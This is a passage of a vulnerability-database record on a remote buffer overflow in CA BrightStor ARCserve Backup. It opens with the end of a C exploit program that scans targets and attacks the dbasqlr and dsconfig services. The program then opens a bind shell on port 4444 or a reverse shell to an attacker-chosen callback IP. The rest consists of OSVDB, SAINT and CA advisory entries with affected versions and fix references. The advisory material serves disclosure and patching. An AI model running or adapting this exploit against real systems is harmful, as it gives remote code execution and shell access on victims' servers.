)\r\n\t\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\t\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\tstart_reverse_handler ( argp->lport );\r\n\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tcase 1:\r\n\t\t\t\t\t\t\tprintf ( \"[%s:%d] \" RED \"closed\" NORMAL \"\\n\", scan_ip, port );\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\tdefault:\r\n\t\t\t\t\t\t\tprintf ( \"[%s:%d] \" RED \"closed\" NORMAL \"\\n\", scan_ip, port );\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t}\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\tcase -1:\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf ( \"fork failed!\\n\");\r\n\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\tdefault:\r\n\t\t\t\t{\r\n\t\t\t\t\tif ( i > MAX_CHILDS - 2 )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\twait ( &status );\r\n\t\t\t\t\t\ti--;\r\n\t\t\t\t\t}\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tif ( ip1 == a && ip2 == b && ip3 == c && ip4 == d )\r\n\t\t\t{\r\n\t\t\t\tclose ( fd );\r\n\t\t\t\tprintf ( \"\\noO---[ scan completed ]---Oo\\n\\n\" );\r\n\t\t\t\texit ( 0 );\r\n\t\t\t}\r\n\t\t}\r\n\t\tip4 = 1;\r\n\t\tip3++;\r\n\t}\r\n}\r\n\r\nvoid\r\nusage ( char* name )\r\n{\r\n\tint i;\r\n\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"Note: all switches have to be specified!\\n\" );\r\n\tprintf ( \"You can choose between bind and cb shellcode later!\\n\" );\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"Usage: %s -t <tip> -l <cbip> -p <cbport>\\n\", name );\r\n\tprintf ( \"\\n\" );\r\n\texit ( 1 );\r\n}\r\n\r\nint\r\nmain ( int argc, char* argv[] )\r\n{\r\n\tint s, action, vuln, sc;\r\n\tunsigned long xoredcbip;\r\n\tunsigned short xoredcbport;\r\n\targs myargs;\r\n\r\n\tsystem ( \"clear\" );\r\n\theader ();\r\n\tparse_arguments ( argc, argv, &myargs );\r\n\tif ( !isip ( myargs.tip ) )\r\n\t{\r\n\t\tprintf ( \"Invalid 
Target IP!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tif ( !isip ( myargs.lip ) )\r\n\t{\r\n\t\tprintf ( \"Invalid Connect Back IP!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\taction = select_action ();\r\n\tif ( !action )\r\n\t\tstart_scanner ( &myargs );\r\n\tvuln = select_vulnerability ();\r\n\tsc = select_shellcode ();\r\n\tswitch ( vuln )\r\n\t{\r\n\t\tcase 0:\r\n\t\t{\r\n\t\t\ts = connect_to_remote_host ( myargs.tip, PORT_DBASQLR );\r\n\t\t\tswitch( sc )\r\n\t\t\t{\r\n\t\t\t\tcase 0:\r\n\t\t\t\t{\r\n\t\t\t\t\tif ( exploit_dbasqlr ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t}\r\n\t\t\t\t\tconnect_to_bindshell ( myargs.tip, 4444 );\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\tcase 1:\r\n\t\t\t\t{\r\n\t\t\t\t\txoredcbip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;\r\n\t\t\t\t\txoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;\r\n\t\t\t\t\tif ( exploit_dbasqlr ( s, xoredcbip, xoredcbport, 0 ) == 1 )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t}\r\n\t\t\t\t\tstart_reverse_handler ( myargs.lport );\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tbreak;\r\n\t\t}\r\n\t\tcase 1:\r\n\t\t{\r\n\t\t\ts = connect_to_remote_host ( myargs.tip, PORT_DSCONFIG );\r\n\t\t\tswitch( sc )\r\n\t\t\t{\r\n\t\t\t\tcase 0:\r\n\t\t\t\t{\r\n\t\t\t\t\tif ( exploit_dsconfig ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t}\r\n\t\t\t\t\tconnect_to_bindshell ( myargs.tip, 4444 );\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\tcase 1:\r\n\t\t\t\t{\r\n\t\t\t\t\txoredcbip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;\r\n\t\t\t\t\txoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;\r\n\t\t\t\t\tif ( exploit_dsconfig ( s, xoredcbip, 
xoredcbport, 0 ) == 1 )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t}\r\n\t\t\t\t\tstart_reverse_handler ( myargs.lport );\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tbreak;\r\n\t\t}\r\n\t}\r\n}\n\n// milw0rm.com [2005-08-03]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1132/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp\nSecurity Tracker: 1017356\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0146.html\nISS X-Force ID: 30791\nFrSIRT Advisory: ADV-2006-4910\n[CVE-2006-6379](https://vulners.com/cve/CVE-2006-6379)\nBugtraq ID: 21502\n", "modified": "2006-12-08T00:00:00", "published": "2006-12-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:30775", "id": "OSVDB:30775", "title": "CA BrightStor ARCserve Backup Discovery Service Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2018-08-31T00:08:14", "bulletinFamily": "exploit", "description": "Added: 12/08/2006 \nCVE: [CVE-2006-6379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6379>) \nBID: [21502](<http://www.securityfocus.com/bid/21502>) \nOSVDB: [30775](<http://www.osvdb.org/30775>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) server includes a discovery service which listens on ports 41523/TCP and 41524/UDP. 
\n\n### Problem\n\nA buffer overflow vulnerability in the `**ASBRDCST.DLL**` library allows remote attackers to execute arbitrary commands by sending a specially crafted command of type 9b to the discovery service. \n\n### Resolution\n\nApply a fix from [Computer Associates](<http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp>). \n\n### References\n\n<http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.1 SP2. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2006-12-08T00:00:00", "published": "2006-12-08T00:00:00", "id": "SAINT:AFD0DC6204D54294BA0B227874738615", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_disc_9b", "title": "BrightStor ARCserve Discovery service 9b command buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "description": "Added: 12/08/2006 \nCVE: [CVE-2006-6379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6379>) \nBID: [21502](<http://www.securityfocus.com/bid/21502>) \nOSVDB: [30775](<http://www.osvdb.org/30775>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) server includes a discovery service which listens on ports 41523/TCP and 41524/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ASBRDCST.DLL**` library allows remote attackers to execute arbitrary commands by sending a specially crafted command of type 9b to the discovery service. \n\n### Resolution\n\nApply a fix from [Computer Associates](<http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp>). 
\n\n### References\n\n<http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.1 SP2. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2006-12-08T00:00:00", "published": "2006-12-08T00:00:00", "id": "SAINT:8940368C56AF9FD6C894F29E6AE5EFBF", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_disc_9b", "type": "saint", "title": "BrightStor ARCserve Discovery service 9b command buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-14T16:58:04", "bulletinFamily": "exploit", "description": "Added: 12/08/2006 \nCVE: [CVE-2006-6379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6379>) \nBID: [21502](<http://www.securityfocus.com/bid/21502>) \nOSVDB: [30775](<http://www.osvdb.org/30775>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) server includes a discovery service which listens on ports 41523/TCP and 41524/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ASBRDCST.DLL**` library allows remote attackers to execute arbitrary commands by sending a specially crafted command of type 9b to the discovery service. \n\n### Resolution\n\nApply a fix from [Computer Associates](<http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp>). \n\n### References\n\n<http://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.1 SP2. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2006-12-08T00:00:00", "published": "2006-12-08T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_disc_9b", "id": "SAINT:53FCF127771E89CD8C76DA47C3BF6B4B", "title": "BrightStor ARCserve Discovery service 9b command buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "description": "\r\nTitle: CAID 34846: CA BrightStor ARCserve Backup Discovery Service \r\nBuffer Overflow Vulnerability\r\n\r\nCA Vulnerability ID (CAID): 34846\r\n\r\nCA Advisory Date: 2006-12-07\r\n\r\nDiscovered By: Assurent Secure Technologies (assurent.com)\r\n\r\nImpact: Remote attacker can execute arbitrary code.\r\n\r\nSummary: CA BrightStor ARCserve Backup contains a buffer overflow \r\nthat allows remote attackers to execute arbitrary code with local \r\nSYSTEM privileges on Windows. 
This issue affects the BrightStor \r\nBackup Discovery Service in multiple BrightStor ARCserve Backup \r\napplication agents and the Base product.\r\n\r\nMitigating Factors: None.\r\n\r\nSeverity: CA has given this vulnerability a High risk rating.\r\n\r\nAffected Products:\r\nBrightStor Products:\r\n- BrightStor ARCserve Backup r11.5 SP1 and below (SP2 does not \r\n have this vulnerability ; please apply r11.5 SP2)\r\n- BrightStor ARCserve Backup r11.1\r\n- BrightStor ARCserve Backup for Windows r11\r\n- BrightStor Enterprise Backup 10.5\r\n- BrightStor ARCserve Backup v9.01 \r\nCA Protection Suites r2:\r\n- CA Server Protection Suite r2\r\n- CA Business Protection Suite r2\r\n- CA Business Protection Suite for Microsoft Small Business Server \r\n Standard Edition r2\r\n- CA Business Protection Suite for Microsoft Small Business Server \r\n Premium Edition r2\r\n\r\nAffected platforms:\r\nMicrosoft Windows\r\n\r\nStatus and Recommendation: \r\nCustomers with vulnerable versions of BrightStor ARCserve Backup \r\nproducts should upgrade to the latest versions which are available \r\nfor download from http://supportconnect.ca.com.\r\nSolution Document Reference APARs: \r\nQO84609, QI82917, QO84611, QO84610\r\n\r\nDetermining if you are affected: \r\nFor a list of updated files, and instructions on how to verify \r\nthat the security update was fully applied, please review the \r\nInformational Solution referenced in the appropriate Solution \r\nDocument.\r\n\r\nReferences (URLs may wrap): \r\nCA SupportConnect:\r\nhttp://supportconnect.ca.com/\r\nCA SupportConnect Security Notice for this vulnerability:\r\nImportant Security Notice for BrightStor ARCserve Backup\r\nhttp://supportconnectw.ca.com/public/storage/infodocs/babsecurity-notice.asp\r\nSolution Document Reference APARs: \r\nQO84609, QI82917, QO84611, QO84610\r\nCA Security Advisor Research Blog postings:\r\nhttp://www3.ca.com/blogs/posting.aspx?id=90744&pid=96149&date=2006/12\r\nCAID: 34846\r\nCAID Advisory 
links: \r\nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34846\r\nDiscoverer: Assurent Secure Technologies\r\nhttp://www.assurent.com/\r\nCVE Reference: CVE-2006-6379\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6379\r\nOSVDB Reference: OSVDB IDs: 30775\r\nhttp://osvdb.org/30775\r\n\r\nChangelog for this advisory:\r\nv1.0 - Initial Release\r\n\r\nCustomers who require additional information should contact CA \r\nTechnical Support at http://supportconnect.ca.com.\r\n\r\nFor technical questions or comments related to this advisory,\r\nplease send email to vuln@ca.com, or contact me directly.\r\n\r\nIf you discover a vulnerability in CA products, please report\r\nyour findings to vuln@ca.com, or utilize our \"Submit a \r\nVulnerability\" form.\r\nURL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx\r\n\r\n\r\nRegards,\r\nKen Williams ; 0xE2941985\r\nDirector, CA Vulnerability Research\r\n\r\nCA, One CA Plaza. Islandia, NY 11749\r\n \r\nContact http://www3.ca.com/contact/\r\nLegal Notice http://www3.ca.com/legal/\r\nPrivacy Policy http://www3.ca.com/privacy/\r\nCopyright \u00a9 2006 CA. All rights reserved.", "modified": "2006-12-08T00:00:00", "published": "2006-12-08T00:00:00", "id": "SECURITYVULNS:DOC:15338", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15338", "title": "[CAID 34846]: CA BrightStor ARCserve Backup Discovery Service Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}